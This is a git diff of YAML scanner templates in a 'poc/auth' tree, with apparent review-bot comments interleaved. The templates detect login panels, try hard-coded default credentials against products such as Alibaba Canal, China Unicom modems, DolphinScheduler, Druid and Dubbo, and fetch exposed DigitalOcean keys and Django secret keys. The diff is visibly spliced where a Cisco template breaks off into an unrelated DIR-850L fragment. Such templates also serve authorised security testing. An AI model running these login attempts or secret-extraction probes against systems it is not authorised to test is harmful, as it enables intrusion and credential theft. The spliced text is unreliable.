@@ -5,18 +5,16 @@ info: author: geeknik severity: critical description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments. - remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom reference: - https://github.com/pry0cc/axiom classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-425 - metadata: - max-request: 1 + remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom tags: axiom,digitalocean,key,exposure -http: +requests: - method: GET path: - "{{BaseURL}}/.axiom/accounts/do.json" @@ -40,4 +38,4 @@ http: regex: - '\"do_key\"\: .*' -# digest: 4a0a00473045022100a9e645db4ccad4bb4a2c55f77872fdef290db609004656d1d6a80c3c8681177e0220328845b85d9651ac0671ab1698e5c1b458c00f1b198e6b727ac209b93ef64c0c:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs on 2022/02/28 diff --git a/poc/auth/axiom-digitalocean-key-exposure-667.yaml b/poc/auth/axiom-digitalocean-key-exposure.yaml similarity index 100% rename from poc/auth/axiom-digitalocean-key-exposure-667.yaml rename to poc/auth/axiom-digitalocean-key-exposure.yaml diff --git a/poc/auth/azkaban-default-login-674.yaml b/poc/auth/azkaban-default-login-674.yaml index 18210bfaf1..be127dd034 100644 --- a/poc/auth/azkaban-default-login-674.yaml +++ b/poc/auth/azkaban-default-login-674.yaml @@ -8,11 +8,10 @@ info: classification: cwe-id: CWE-798 metadata: - max-request: 1 shodan-query: http.title:"Azkaban Web Client" tags: default-login,azkaban -http: +requests: - raw: - | POST / HTTP/1.1 @@ -27,7 +26,6 @@ http: password: - admin attack: pitchfork - matchers-condition: and matchers: - type: word @@ -52,4 +50,4 @@ http: kval: - azkaban.browser.session.id -# digest: 490a004630440220213e5751c50d6c103e6c07db12c85cc18aba0409a4f37db922316c0382c967b102202a925a305683b2216035c26b665720e900e8202b24feddc84a70e90bcb25e809:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 
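Review bot: The extractor kept as context at the end of `axiom-digitalocean-key-exposure-666.yaml`, `- '\"do_key\"\: .*'`, copies the rest of the matched line, and with it the DigitalOcean key, into the scan result. Output from this template therefore has to be stored and shared as secret material, and a hit should lead to key rotation as well as to restricting access to `do.json`, which is all the `remediation` field currently mentions. A comment above the extractor would make that explicit, for example `# extracted value is a live API key; treat scan output as sensitive`. The extractors block starts outside the hunk, so it may contain more than is shown here.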
diff --git a/poc/auth/azkaban-default-login-673.yaml b/poc/auth/azkaban-default-login.yaml similarity index 100% rename from poc/auth/azkaban-default-login-673.yaml rename to poc/auth/azkaban-default-login.yaml diff --git a/poc/auth/basic-auth-detection-687.yaml b/poc/auth/basic-auth-detection-689.yaml similarity index 100% rename from poc/auth/basic-auth-detection-687.yaml rename to poc/auth/basic-auth-detection-689.yaml diff --git a/poc/auth/bazarr-login-702.yaml b/poc/auth/bazarr-login-702.yaml new file mode 100644 index 0000000000..2b2e898677 --- /dev/null +++ b/poc/auth/bazarr-login-702.yaml @@ -0,0 +1,19 @@ +id: bazarr-login-detect + +info: + name: Bazarr Login Detect + author: r3dg33k + severity: info + reference: + - https://www.bazarr.media/ + tags: panel,bazarr,login + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: word + words: + - 'Bazarr' \ No newline at end of file diff --git a/poc/auth/beyondtrust-login-server.yaml b/poc/auth/beyondtrust-login-server.yaml index b2bb002482..fb449479a2 100644 --- a/poc/auth/beyondtrust-login-server.yaml +++ b/poc/auth/beyondtrust-login-server.yaml 
@@ -1,31 +1,42 @@ -id: beyondtrust-login-server - -info: - name: BeyondTrust PAM login Server - author: r3dg33k,nuk3s3c - severity: info - tags: beyondtrust,pam,panel - -requests: - - method: GET - path: - - '{{BaseURL}}/WebConsole/api/security/auth/loginServers' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - '"DomainName":"(.*)"' - - '"domains":' - condition: and - - extractors: - - type: json - part: body - json: - - ".domains[] | .DomainName" - - ".domains[] | .ldapservers" \ No newline at end of file +id: beyondtrust-login-server + +info: + name: BeyondTrust Privileged Access Management Login - Detect + author: r3dg33k,nuk3s3c + severity: info + description: BeyondTrust Privileged Access Management login panel was detected. + reference: + - https://www.beyondtrust.com/brand + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: beyondtrust,pam,panel + +http: + - method: GET + path: + - '{{BaseURL}}/WebConsole/api/security/auth/loginServers' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - '"DomainName":"(.*)"' + - '"domains":' + condition: and + + extractors: + - type: json + part: body + json: + - ".domains[] | .DomainName" + - ".domains[] | .ldapservers" + +# digest: 4a0a00473045022100b2c3e6ac6b56555ebac3c5334096275e7e70982c4500b136c0e89fb2b421378d02201aca2353da6e9d6d15c681b3ebf72a4a4c7e3ba3be4774297814c1aa078e412d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/bigbluebutton-login-726.yaml b/poc/auth/bigbluebutton-login-724.yaml similarity index 100% rename from poc/auth/bigbluebutton-login-726.yaml rename to poc/auth/bigbluebutton-login-724.yaml diff --git a/poc/auth/blue-iris-login-751.yaml b/poc/auth/blue-iris-login-751.yaml deleted file mode 100644 index 4a1e4acd08..0000000000 --- a/poc/auth/blue-iris-login-751.yaml +++ /dev/null 
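Review bot: The new `description` and `classification` in `beyondtrust-login-server.yaml` describe a login panel detection with a CVSS score of 0, but the request goes to `/WebConsole/api/security/auth/loginServers` and the extractors return `.domains[] | .DomainName` and `.domains[] | .ldapservers`. If that endpoint answers without authentication, the finding is exposure of directory domain and LDAP server names, and the description should say so in order that it is triaged as information disclosure. Suggested wording: `description: BeyondTrust PAM loginServers endpoint is reachable and returns configured domain and LDAP server names.` Every line of the file is rewritten in this hunk, which looks like a line-ending change; worth confirming that it was intended.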
@@ -1,31 +0,0 @@ -id: blue-iris-login - -info: - name: Blue Iris Login - author: dhiyaneshDK - severity: info - description: A Blue Iris login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6814 - - https://blueirissoftware.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: panel,blue-iris - -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Blue Iris Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/blue-iris-login-753.yaml b/poc/auth/blue-iris-login-753.yaml index 783f3c0527..4a1e4acd08 100644 --- a/poc/auth/blue-iris-login-753.yaml +++ b/poc/auth/blue-iris-login-753.yaml @@ -2,17 +2,17 @@ id: blue-iris-login info: name: Blue Iris Login - author: dhiyaneshDK,idealphase + author: dhiyaneshDK severity: info description: A Blue Iris login panel was detected. reference: - https://www.exploit-db.com/ghdb/6814 - https://blueirissoftware.com/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris + tags: panel,blue-iris requests: - method: GET @@ -24,13 +24,8 @@ requests: - type: word words: - 'Blue Iris Login' - - type: status status: - 200 - extractors: - - type: regex - group: 1 - regex: - - 'var bi_version = "(.*)";' +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/blue-iris-login-754.yaml b/poc/auth/blue-iris-login-754.yaml new file mode 100644 index 0000000000..224b1d1b46 --- /dev/null +++ b/poc/auth/blue-iris-login-754.yaml 
@@ -0,0 +1,22 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6814 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 diff --git a/poc/auth/braintree-access-token-773.yaml b/poc/auth/braintree-access-token-773.yaml index cc50596326..fc4e695c66 100644 --- a/poc/auth/braintree-access-token-773.yaml +++ b/poc/auth/braintree-access-token-773.yaml @@ -4,7 +4,7 @@ info: name: PayPal Braintree Access Token Disclosure author: Ice3man severity: info - tags: exposure,token,paypal + tags: exposure,token requests: - method: GET @@ -14,4 +14,4 @@ requests: - type: regex part: body regex: - - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' + - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/poc/auth/braintree-access-token.yaml b/poc/auth/braintree-access-token.yaml deleted file mode 100644 index fc4e695c66..0000000000 --- a/poc/auth/braintree-access-token.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: braintree-access-token - -info: - name: PayPal Braintree Access Token Disclosure - author: Ice3man - severity: info - tags: exposure,token - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/poc/auth/branch-key-774.yaml b/poc/auth/branch-key-774.yaml index 1b63de346f..877dd31a45 100644 --- a/poc/auth/branch-key-774.yaml +++ b/poc/auth/branch-key-774.yaml @@ -4,7 +4,8 @@ info: name: Branch.io Live Key author: 0xh7ml severity: info - reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + reference: + - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 tags: token,file file: 
diff --git a/poc/auth/brother-unauthorized-access-792.yaml b/poc/auth/brother-unauthorized-access-793.yaml similarity index 100% rename from poc/auth/brother-unauthorized-access-792.yaml rename to poc/auth/brother-unauthorized-access-793.yaml diff --git a/poc/auth/brother-unauthorized-access.yaml b/poc/auth/brother-unauthorized-access.yaml index c57d504fb3..f3e5d8283c 100644 --- a/poc/auth/brother-unauthorized-access.yaml +++ b/poc/auth/brother-unauthorized-access.yaml @@ -1,29 +1,25 @@ -id: brother-unauthorized-access +id: brother-unauthorized-access -info: - name: Brother Printer - author: pussycat0x - severity: medium - reference: https://www.exploit-db.com/ghdb/6889 - metadata: - max-request: 1 - tags: iot,printer,unauth +info: + name: Brother Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6889 + tags: iot,printer,unauth -http: - - method: GET - path: - - "{{BaseURL}}/net/net/net.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - "Network Status" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100bc48aa1c015d7454147e9553d8c430f7a53e2888d1184923895f4f8c24f695e302201cf12a115bccdd3e47356f9ffe206676937b6d2d14841de4ba2ad78bd7a4da7f:922c64590222798bb761d5b6d8e72950 +requests: + - method: GET + path: + - "{{BaseURL}}/net/net/net.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Brother Industries" + - "Network Status" + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/canal-default-login-846.yaml b/poc/auth/canal-default-login-846.yaml new file mode 100644 index 0000000000..6a73132d6f --- /dev/null +++ b/poc/auth/canal-default-login-846.yaml 
@@ -0,0 +1,44 @@ +id: canal-default-login + +info: + name: Alibaba Canal Default Login + author: pdteam + description: An Alibaba Canal default login was discovered. + severity: high + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: alibaba,default-login + +requests: + - raw: + - | + POST /api/v1/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - admin + pass: + - 123456 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + condition: and + words: + - 'data":{"token"' + - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/canal-default-login-848.yaml b/poc/auth/canal-default-login-848.yaml index 6a73132d6f..d9b73d5898 100644 --- a/poc/auth/canal-default-login-848.yaml +++ b/poc/auth/canal-default-login-848.yaml @@ -3,8 +3,8 @@ id: canal-default-login info: name: Alibaba Canal Default Login author: pdteam - description: An Alibaba Canal default login was discovered. severity: high + description: An Alibaba Canal default login was discovered. reference: - https://github.com/alibaba/canal/wiki/ClientAdapter classification: diff --git a/poc/auth/canal-default-login-849.yaml b/poc/auth/canal-default-login-849.yaml deleted file mode 100644 index a4c4a1b801..0000000000 --- a/poc/auth/canal-default-login-849.yaml +++ /dev/null 
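Review bot: canal-default-login-846.yaml is added with `id: canal-default-login`, the id that canal-default-login-848.yaml already carries, and its blob `6a73132d6f` is the pre-change content of -848, so the directory now holds two copies of one template. Unless the scanner de-duplicates by id, each target may receive the `admin`/`123456` login request twice per run, which doubles authentication attempts against systems that lock accounts or alert on repeated logins. I would keep a single file per id. dolphinscheduler-default-login-7072/-7073 and dvwa-headless-automatic-login-7131/-7133 repeat the pattern in this patch.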
@@ -1,35 +0,0 @@
-id: canal-default-login
-
-info:
- name: Alibaba Canal Default Login
- author: pdteam
- severity: high
- tags: alibaba,default-login
-
-requests:
- - raw:
- - |
- POST /api/v1/user/login HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/json
-
- {"username":"{{user}}","password":"{{pass}}"}
-
- attack: pitchfork
- payloads:
- user:
- - admin
- pass:
- - 123456
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- condition: and
- words:
- - 'data":{"token"'
- - '"code":20000'
diff --git a/poc/auth/chinaunicom-default-login-906.yaml b/poc/auth/chinaunicom-default-login-906.yaml
deleted file mode 100644
index 264ffd5f07..0000000000
--- a/poc/auth/chinaunicom-default-login-906.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: chinaunicom-default-login
-
-info:
- name: China Unicom Modem Default Login
- author: princechaddha
- severity: high
- description: Default login credentials were discovered for a China Unicom modem.
- tags: chinaunicom,default-login
- classification:
- cwe-id: CWE-798
-
-requests:
- - raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Hostname}}
-
- frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
-
- attack: pitchfork
- payloads:
- username:
- - CUAdmin
- password:
- - CUAdmin
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
-
- - type: word
- words:
- - "/menu.gch"
- part: header
-
-# Enhanced by mp on 2022/03/03
diff --git a/poc/auth/chinaunicom-default-login-908.yaml b/poc/auth/chinaunicom-default-login-908.yaml
index 8bc1986879..264ffd5f07 100644
--- a/poc/auth/chinaunicom-default-login-908.yaml
+++ b/poc/auth/chinaunicom-default-login-908.yaml
@@ -5,13 +5,11 @@ info: author: princechaddha severity: high description: Default login credentials were discovered for a China Unicom modem. + tags: chinaunicom,default-login classification: cwe-id: CWE-798 - metadata: - max-request: 1 - tags: chinaunicom,default-login -http: +requests: - raw: - | POST /cu.html HTTP/1.1 @@ -37,4 +35,4 @@ http: - "/menu.gch" part: header -# digest: 4a0a0047304502201dae0347d4fa926986d01f472884cbc0ff36f41fd9e810a538b97a2f0edcdaab022100c2a949b7e213eca0a23fd1fafbccefbc89468ef80a0af4fd072bbfc704faae11:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/chinaunicom-modem-default-credentials.yaml b/poc/auth/chinaunicom-modem-default-credentials.yaml index ed58f2f847..9498a9b6f9 100644 --- a/poc/auth/chinaunicom-modem-default-credentials.yaml +++ b/poc/auth/chinaunicom-modem-default-credentials.yaml @@ -1,11 +1,9 @@ id: chinaunicom-modem-default-credentials - info: name: Chinaunicom Modem Default Credentials author: princechaddha severity: high tags: chinaunicom,default-login - requests: - method: POST path: diff --git a/poc/auth/cisco-finesse-login-938.yaml b/poc/auth/cisco-finesse-login-938.yaml deleted file mode 100644 index 0944959e91..0000000000 --- a/poc/auth/cisco-finesse-login-938.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cisco-finesse-login - -info: - name: Cisco Finesse Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6824 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in to Cisco Finesse' - - type: status - status: - - 200 diff --git a/poc/auth/cisco-finesse-login-940.yaml b/poc/auth/cisco-finesse-login-940.yaml new file mode 100644 index 0000000000..ad8938564b --- /dev/null +++ b/poc/auth/cisco-finesse-login-940.yaml 
@@ -0,0 +1,23 @@ +id: cisco-finesse-login + +info: + name: Cisco Finesse Login + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6824 + tags: panel,cisco + +requests: + - method: GET + path: + - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in to Cisco Finesse' + - type: status + status: + - 200 diff --git a/poc/auth/cisco-integrated-login-941.yaml b/poc/auth/cisco-integrated-login-941.yaml index 0804d5a189..5f716a0018 100644 --- a/poc/auth/cisco-integrated-login-941.yaml +++ b/poc/auth/cisco-integrated-login-941.yaml @@ -4,7 +4,8 @@ info: name: Cisco Integrated Management Controller Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/3859 + reference: + - https://www.exploit-db.com/ghdb/3859 tags: panel,cisco requests: diff --git a/poc/auth/cisco-systems-login-973.yaml b/poc/auth/cisco-systems-login-973.yaml new file mode 100644 index 0000000000..25607b3bbf --- /dev/null +++ b/poc/auth/cisco-systems-login-973.yaml @@ -0,0 +1,25 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Systems Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 diff --git a/poc/auth/cisco-systems-login-975.yaml b/poc/auth/cisco-systems-login-975.yaml deleted file mode 100644 index 96ae7b9ee4..0000000000 --- a/poc/auth/cisco-systems-login-975.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: cisco-systems-login - -info: - name: Cisco Systems Login - author: dhiyaneshDk,idealphase - severity: info - metadata: - shodan-query: http.title:"Cisco Systems Login" - google-query: intitle:"Cisco Systems Login" - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Cisco Systems Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - ' : DIR-850L' + - '"Hardware Version"' + - '"Firmware Version"' + condition: and \ No newline at end of file diff --git a/poc/auth/directadmin-login-panel-7000.yaml b/poc/auth/directadmin-login-panel-7000.yaml new file mode 100644 index 0000000000..a6e369bf31 --- /dev/null +++ b/poc/auth/directadmin-login-panel-7000.yaml @@ -0,0 +1,23 @@ +id: directadmin-login-panel +info: + name: DirectAdmin Login Panel Detect + author: idealphase + severity: info + description: A modern control panel's primary purpose is to effectively facilitate the routine management of your hosting infrastructure and present these tasks simply and intuitively to both the user and to you as the administrator. + reference: + - https://www.directadmin.com/whats_new.php + metadata: + shodan-query: title:"DirectAdmin Login" + tags: panel,directadmin +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "DirectAdmin Login" + - type: status + status: + - 200 diff --git a/poc/auth/django-secret-key.yaml b/poc/auth/django-secret-key.yaml deleted file mode 100644 index 8ec28a5f5e..0000000000 --- a/poc/auth/django-secret-key.yaml +++ /dev/null 
@@ -1,31 +0,0 @@
-id: django-secret-key
-
-info:
- name: Django Secret Key
- author: geeknik
- severity: high
- tags: django
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/settings.py"
- - "{{BaseURL}}/app/settings.py"
- - "{{BaseURL}}/django/settings.py"
- - "{{BaseURL}}/settings/settings.py"
- - "{{BaseURL}}/web/settings/settings.py"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: body
- words:
- - "SECRET_KEY ="
- - type: word
- part: header
- words:
- - "text/html"
- negative: true
diff --git a/poc/auth/django-secret.key.yaml b/poc/auth/django-secret.key.yaml
new file mode 100644
index 0000000000..d682cce94f
--- /dev/null
+++ b/poc/auth/django-secret.key.yaml
@@ -0,0 +1,62 @@
+id: django-secret-key
+
+info:
+ name: Django Secret Key Exposure
+ author: geeknik,DhiyaneshDk
+ severity: high
+ description: |
+ The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file.
+ reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
+ metadata:
+ verified: true
+ max-request: 7
+ shodan-query: html:settings.py
+ comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.'
+ tags: django,exposure,files
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/manage.py"
+ - "{{BaseURL}}/settings.py"
+ - "{{BaseURL}}/app/settings.py"
+ - "{{BaseURL}}/django/settings.py"
+ - "{{BaseURL}}/settings/settings.py"
+ - "{{BaseURL}}/web/settings/settings.py"
+ - "{{BaseURL}}/{{app_name}}/settings.py"
+
+ stop-at-first-match: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "SECRET_KEY ="
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ negative: true
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"DJANGO_SECRET_KEY", "(.*)"'
+
+ - type: regex
+ part: body
+ internal: true
+ name: app_name
+ group: 1
+ regex:
+ - "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)"
+
+# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950
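Review bot: The matcher gates on the literal `SECRET_KEY =` while the public extractor only captures the `"DJANGO_SECRET_KEY", "(.*)"` form, so a settings file with a direct assignment is reported without an extracted value, and the greedy `(.*)` runs to the last quote on the line. I would bound the capture, `- '"DJANGO_SECRET_KEY", "([^"]*)"'`, and add a comment above that extractor noting that the captured value is a live secret written into scan output, so reports need the same handling as the key itself. The file name `django-secret.key.yaml` also uses a dot where the sibling templates use a hyphen.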
diff --git a/poc/auth/dolphinscheduler-default-login-7072.yaml b/poc/auth/dolphinscheduler-default-login-7072.yaml index c77249a51f..139ea8c34e 100644 --- a/poc/auth/dolphinscheduler-default-login-7072.yaml +++ b/poc/auth/dolphinscheduler-default-login-7072.yaml @@ -1,18 +1,20 @@ id: dolphinscheduler-default-login + info: name: Apache DolphinScheduler Default Login author: For3stCo1d - severity: high description: Apache DolphinScheduler default admin credentials were discovered. - reference: - - https://github.com/apache/dolphinscheduler + severity: high + reference: https://github.com/apache/dolphinscheduler + metadata: + shodan-query: http.title:"DolphinScheduler" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.title:"DolphinScheduler" tags: apache,dolphinscheduler,default-login,oss + requests: - raw: - | @@ -21,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded userName={{user}}&userPassword={{pass}} + attack: pitchfork payloads: user: - admin pass: - dolphinscheduler123 + matchers-condition: and matchers: - type: word @@ -35,6 +39,7 @@ requests: - '"msg":"login success"' - '"sessionId":' condition: and + - type: status status: - 200 diff --git a/poc/auth/dolphinscheduler-default-login-7073.yaml b/poc/auth/dolphinscheduler-default-login-7073.yaml new file mode 100644 index 0000000000..9c25ef84bb --- /dev/null +++ b/poc/auth/dolphinscheduler-default-login-7073.yaml 
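Review bot: `cve-id:` is added under `classification` with no value, which parses as a null and carries no information; the line should be dropped, or filled only if a CVE actually applies. The same empty key is added in emqx-default-login.yaml later in this patch. This hunk also turns `reference` from a list into a scalar, while other files in the same commit go the other way (branch-key-774.yaml, cisco-integrated-login-941.yaml); one form across the tree would be easier to lint.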
@@ -0,0 +1,48 @@ +id: dolphinscheduler-default-login + +info: + name: Apache DolphinScheduler Default Login + author: For3stCo1d + severity: high + description: Apache DolphinScheduler default admin credentials were discovered. + reference: + - https://github.com/apache/dolphinscheduler + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + shodan-query: http.title:"DolphinScheduler" + tags: apache,dolphinscheduler,default-login,oss + +http: + - raw: + - | + POST /dolphinscheduler/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{user}}&userPassword={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - dolphinscheduler123 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"msg":"login success"' + - '"sessionId":' + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502207145a1c47f315245ad5c976b1b397ac9505b36481698a247e81ecd41d4c6f76f022100aa4e7fd43be6c89acf664d53e830f9b9b4d47d33900d3bd45b34ff1433bf6104:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/druid-default-login-7096.yaml b/poc/auth/druid-default-login-7096.yaml index 1a787c7ba6..934ad5bd05 100644 --- a/poc/auth/druid-default-login-7096.yaml +++ b/poc/auth/druid-default-login-7096.yaml @@ -4,9 +4,9 @@ info: author: pikpikcu severity: high description: Apache Druid default login information (admin/admin) was discovered. + tags: druid,default-login classification: cwe-id: CWE-798 - tags: druid,default-login requests: - raw: - | diff --git a/poc/auth/druid-default-login.yaml b/poc/auth/druid-default-login.yaml index 934ad5bd05..22698fdfe0 100644 --- a/poc/auth/druid-default-login.yaml +++ b/poc/auth/druid-default-login.yaml 
@@ -1,13 +1,17 @@ id: druid-default-login + info: - name: Apache Druid Default Login + name: Alibaba Druid Monitor Default Login author: pikpikcu severity: high - description: Apache Druid default login information (admin/admin) was discovered. - tags: druid,default-login + description: Alibaba Druid Monitor default login information (admin/admin) was discovered. classification: cwe-id: CWE-798 -requests: + metadata: + max-request: 2 + tags: druid,alibaba,default-login + +http: - raw: - | POST /druid/submitLogin HTTP/1.1 @@ -19,19 +23,22 @@ requests: Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "^success$" -# Enhanced by mp on 2022/03/03 +# digest: 4a0a0047304502203dfdfa52e3c78cf6b97da6c9696cbd67765e254ee413a412325e57b4cd454ef0022100d443785f6f2d4979660305541336a2f74f56b2c5efacb43b07928e7831b0bc03:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/dubbo-admin-default-login.yaml b/poc/auth/dubbo-admin-default-login-7120.yaml similarity index 100% rename from poc/auth/dubbo-admin-default-login.yaml rename to poc/auth/dubbo-admin-default-login-7120.yaml diff --git a/poc/auth/dubbo-admin-default-login-7121.yaml b/poc/auth/dubbo-admin-default-login-7121.yaml index f5f6605a54..8d78175d78 100644 --- a/poc/auth/dubbo-admin-default-login-7121.yaml +++ b/poc/auth/dubbo-admin-default-login-7121.yaml 
@@ -1,18 +1,28 @@ id: dubbo-admin-default-login + info: - name: Dubbo Admin Default Login + name: Apache Dubbo - Default Admin Discovery author: ritikchaddha severity: high + description: Apache Dubbo default admin credentials were discovered. reference: - https://www.cnblogs.com/wishwzp/p/9438658.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 tags: dubbo,apache,default-login -requests: + +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork payloads: username: @@ -21,6 +31,7 @@ requests: password: - guest - root + matchers-condition: and matchers: - type: word @@ -29,6 +40,9 @@ requests: - "/sysinfo/versions" - "{{username}}', '/logout')" condition: and + - type: status status: - 200 + +# digest: 490a00463044022002689a9cad9b9029a66dd25206f2746f2953562839d6e5d8e42fe9b4765a948b02203ee35baa4941a2d5023486da3377f591f1b9d5f39c93e75c4db342d0aafa2c2f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/dvwa-default-login-7129.yaml b/poc/auth/dvwa-default-login-7129.yaml index 34dd333c57..eb0669859d 100644 --- a/poc/auth/dvwa-default-login-7129.yaml +++ b/poc/auth/dvwa-default-login-7129.yaml @@ -3,12 +3,7 @@ info: name: DVWA Default Login author: pdteam severity: critical - description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario. tags: dvwa,default-login - reference: - - https://opensourcelibs.com/lib/dvwa - classification: - cwe-id: CWE-798 requests: - raw: - | @@ -49,5 +44,3 @@ requests: - type: word words: - "You have logged in as 'admin'" - -# Enhanced by mp on 2022/03/03 
